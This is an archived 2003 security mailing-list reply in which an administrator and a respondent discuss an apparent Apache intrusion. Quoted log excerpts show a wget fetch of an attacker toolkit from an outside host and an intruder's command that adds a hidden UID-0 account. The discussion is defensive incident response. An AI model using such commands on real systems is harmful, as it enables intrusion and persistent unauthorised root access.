Mailinglist Archive: opensuse-security (334 mails)

< Previous Next >
Re: [suse-security] Re: Apache Gain Remote Shell Access
  • From: Marco Lum <marco@xxxxxxxxxxxxx>
  • Date: Thu, 04 Sep 2003 02:35:42 +0800
  • Message-id: <3F56347E.3010604@xxxxxxxxxxxxx>
Checked, No Root access gen.
No CGI ACCESS - No log in access_log
No Shell Access by wwwrun
Not infected but Linux.RST.B (Scan all bin/sbin/user/bin also check by
hand, No unknow out going connection)
Play back his history, root access cannot be done
All task stop when I stop apache
BTW, what is the hell "raver".

Stefan Andreas Tichy wrote:

> On Thu, Sep 04, 2003 at 12:43:07AM +0800, Marco Lum wrote:
>
>>Follows found in error_log of apache
>>
>>--09:41:10-- http://www.vulturul.org/vulturul/vulturu.tgz
>> => `vulturu.tgz'
>>Resolving www.vulturul.org... done.
>>Connecting to www.vulturul.org[195.110.124.188]:80... connected.
>>HTTP request sent, awaiting response... 200 OK
>>Length: 9,432 [application/x-tar]
>>
>> 0K ......... 100%
>>13.69 KB/s
>>
>>09:41:17 (13.69 KB/s) - `vulturu.tgz' saved [9432/9432]
>
>
>
> Wget output in apache error_log. Check for a CGI (shell script?)
> allowing clients to execute arbitrary commands.
>
>
>
>
>>Also Found his command history:
>>
>>
>> id
>>/usr/sbin/adduser vulturul -u0 -g0 -M;
>
>
> He has root access but is not shure about that?
>
> At least two problems. Execution of commands as user wwwrun and
> local root compromise.
>
> I hope the box has been disconnectet from the network already.
>
>

--
Marco Lum
Net Service Manager

___________________________________________________________________________________________
System Development Service
Inter/Intra/Local-Area Networking Service

VOICE: +852 2851 1190
FAX : +852 2851 1109
Email: enquiry@xxxxxxxxxxxxx
WWWeb: http://www.hkservice.com

HK Service Company
HK Service Consultants Limited



< Previous Next >